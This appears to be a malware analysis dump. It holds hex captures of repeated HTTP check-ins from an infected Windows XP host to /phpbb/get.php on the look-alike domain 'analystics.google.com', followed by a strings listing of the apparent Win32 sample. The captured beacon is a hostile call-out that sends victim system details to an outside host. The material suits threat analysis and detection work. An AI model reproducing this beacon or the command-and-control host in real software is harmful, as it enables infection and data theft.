0x000000a0 (00160)   5779672b 57726b53 4a597077 58785a4c   Wyg+WrkSJYpwXxZL
0x000000b0 (00176)   56475851 44386443 49664571 71435573   VGXQD8dCIfEqqCUs
0x000000c0 (00192)   58787631 53677a64 54324b58 41512048   Xxv1SgzdT2KXAQ H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 35383626   XX0000&key=2586&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d353537 266f733d 352e312e 32363030   =557&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   5779672b 57726b53 4a597077 58785a4c   Wyg+WrkSJYpwXxZL
0x000000b0 (00176)   56475851 44386443 49664571 71435573   VGXQD8dCIfEqqCUs
0x000000c0 (00192)   5878762b 656d7063 626a612b 78542048   Xxv+empcbja+xT H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 35383626   XX0000&key=2586&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d353537 266f733d 352e312e 32363030   =557&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   5779672b 57726b53 4a597077 58785a4c   Wyg+WrkSJYpwXxZL
0x000000b0 (00176)   56475851 44386443 49664571 71435573   VGXQD8dCIfEqqCUs
0x000000c0 (00192)   58787632 5a555863 414b5359 6c552048   Xxv2ZUXcAKSYlU H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 35383626   XX0000&key=2586&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d353537 266f733d 352e312e 32363030   =557&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   5779672b 57726b53 4a597077 58785a4c   Wyg+WrkSJYpwXxZL
0x000000b0 (00176)   56475851 44386443 49664571 71435573   VGXQD8dCIfEqqCUs
0x000000c0 (00192)   58787677 4f664f59 6270674a 2f4a2048   XxvwOfOYbpgJ/J H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d32 35383626   XX0000&key=2586&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d353537 266f733d 352e312e 32363030   =557&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   5779672b 57726b53 4a597077 58785a4c   Wyg+WrkSJYpwXxZL
0x000000b0 (00176)   56475851 44386443 49664571 71435573   VGXQD8dCIfEqqCUs
0x000000c0 (00192)   58787677 79536336 54417937 556b2048   XxvwySc6TAy7Uk H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....


Strings
..
.w
W....J-.
.
.....
 
.
0
9
.
......
.
~........
.
.
..
.9.
.
.9909.
..90
.\
X...
..
a.
.G.I.
%
...0
V
<..
.~..
......
.9

1000
7fapdw9
akzxcx0_
&Cancel
CONTINUE
cy447
Dialog
drshsbtuttbaphj
DVCLAL
ehte5-
f+f5n3gru0
Generic1
IDC_CONTINUE
IDC_EULACHECK
IDC_EULAMESSAGE
j+9wwlhy8t++w
jc9+jpk0#w2
LDAP
msctls_progress32
MS Sans Serif
NT AUTHORITY
Operation
PACKAGEINFO
Progress
TEXTFILEDLG
tuj7z5rk 0#053g-
tx56
vo#+x60bd
wog#g35n-fhh-c 
wycnm
xjjd94qqaxxt5-#
*000;0A0^0h0n0t0z0
0%0+060A0J0P0\0b0q0w0
0(080=0T0[0a0g0m0v0
0)0V0\0f0l0t0
0'1.1e1o1u1
03090?0E0K0p0v0|0
:#:*:0:6:<:H:Q:W:]:c:i:o:v:|:
1&1,121>1{1
1#1+13191?1
1#1*1R1\1b1h1o1
12181?1o1
?"?1?;?A?H?
:+:1:;:C:I:O:U:[:e:q:w:
2#21252F2X2^2d2j2p2v2|2
2#2)2/252:2@2R2^2d2i2o2z2
2'2/242;2B2K2S2[2e2x2}2
2-292@2F2X2h2x2~2
;";*;2;:;B;J;R;Z;b;p;v;|;
<!<+<2<?<G<N<X<b<h<
2L2X2v2
:&:,:2:X:b:i:o:u:
3"3)30383?3T3o3y3
3!3'3-33393?3K3T3[3e3m3s3~3
3#3-333A3I3O3U3[3a3h3s3
3%3+3;3R3[3a3g3m3s3y3
3'3-373@3F3W3]3i3r3{3
3q<Irug
404;4E4K4Q4W4h5{5
4+414@4T4
4)4/454;4X4^4
4!4+474?4T4`4f4l4
4+565@5F5L5R5f5l5
<4<A<G<Q<[<a<j<p<v<|<
;$;*;4;C;h;n;};
;+<4<><D<N<
:#:.:4:@:F:R:e:o:u:
4n?4>6m9Sq?~l>x3
4T4Z4a4k4q4
5$53595F5N5X5^5d5
5&5.5?5Y5c5l5{5
5#5.585A5G5M5S5Y5_5f5l5v5
5/5*)5/9=/@,3,,>(+3<'88+89)A1'0.*)$.@-?$<:(=7+84
5^#T`1
6!6+61676K6Q6X6b6f6m6
6(6.666@6i6o6u6{6
6-6=6M6]6
6 696K6S6v6
6%6E6O6U6_6g6n6t6
/66x\J
6"7(7.797?7M7_7
697@7H7t7
.6%R+7
6_+tJz@
7"767B7P7
7#7)7.757?7L7W7a7g7m7s7}7
7!7:7I7Q7[7a7k7u7}7
7,868<8B8G8O8U8a8g8n8t8z8
7;8A8K8Q8X8`8f8l8v8
%?/,,.*+7>:B
=7=D=J=P=j=r=y=
=!=+=7=D=N=W=]=g=m=s=z=
>">,>7>?>M>U>m>~>
7p$.TK,/
829:9G9U9[9o9
8 8*80868?8J8T8`8{8
8"8)8/858<8B8M8S8]8c8i8o8u8{8
8>%96(:A/$9&380$B'$,4;?1B&,)=&>0@@0.&(32
8:9@9F9N9X9_9l9{9
>-?8?B?H?k?
8naKhQ
9#9)9/959>9D9J9P9X9^9k9q9x9~9
9'9.9:9A9G9M9S9Y9b9h9n9t9z9
=!=(=9=?=E=K=Q=W=g=n=t=z=
A_A^A]A\_^]
advapi32.dll
aEQm5/
AH!!tP{
akw33p9
AreAllAccessesGranted
b5NXWGC
b7k+u-5u3h4bcjk5
BackupSeek
:>bZ/u
CompareStringW
CopyFileW
@CpMl<
CreateFileW
CreateHardLinkW
CreateMailslotA
CreateTimerQueueTimer
d2o90kcezti_
d83sehk6aogo6nx#
DBYu]Q
dgh&(]
DnsHostnameToComputerNameW
DrawCaption
DZXoKR
eaWU+F
;$;E;L;S;];c;p;v;
FindNextChangeNotification
<F=[=l=
<'<<<F<L<R<w<
>$>.>>>F>N>V>^>f>n>v>~>
FormatMessageA
FreeLibraryAndExitThread
GetAtomNameA
GetCommandLineA
GetCurrentDirectoryA
GetStartupInfoW
GetStringTypeExW
GetUserNameW
GlobalUnfix
hC3c(Dm
HeapCompact
<!<'<><H<N<T<]<c<s<~<
=?=H=X=^=c=
iBT1o<
.idata
ImpersonateNamedPipeClient
>&>I>O>U>b>|>
it7T/E5
j3c#hq
jMQ'g5
?!?'?.?<?J?P?V?\?b?i?|?
J%xUZi
k=3D}[
k5yL#eB
kernel32.dll
kern#=G
.Kh Be
K>'?uy
;$;.;=;L;
<-l7)E
LoadLibraryA
LockFileEx
+m4-xuwvjzr#w4rrgtd
[~MR8r-
Mrx	bF
>M>S>]>u>{>
nE{@|%
  npshd 0m- 
n/!@zU
ObjectPrivilegeAuditAlarmA
ok9X?%$
'O.*rfU
P.rsrc
$QC9M 
qk%^DWi
Qk Na)
.reloc
RSU'L>
"[R{$T
SetComputerNameA
sIH	TF
SYNSu!o
This program must be run under Win32
TryEnterCriticalSection
 U5Tl,
u@Hu$:
user32.dll
|v(Cos
/=VnJ"
Vtdy0)d
w6I2OV
'",w* d
Wr7`0B
 !XPhF
"Y!&8>\
Y#/|gx
yY.@EB[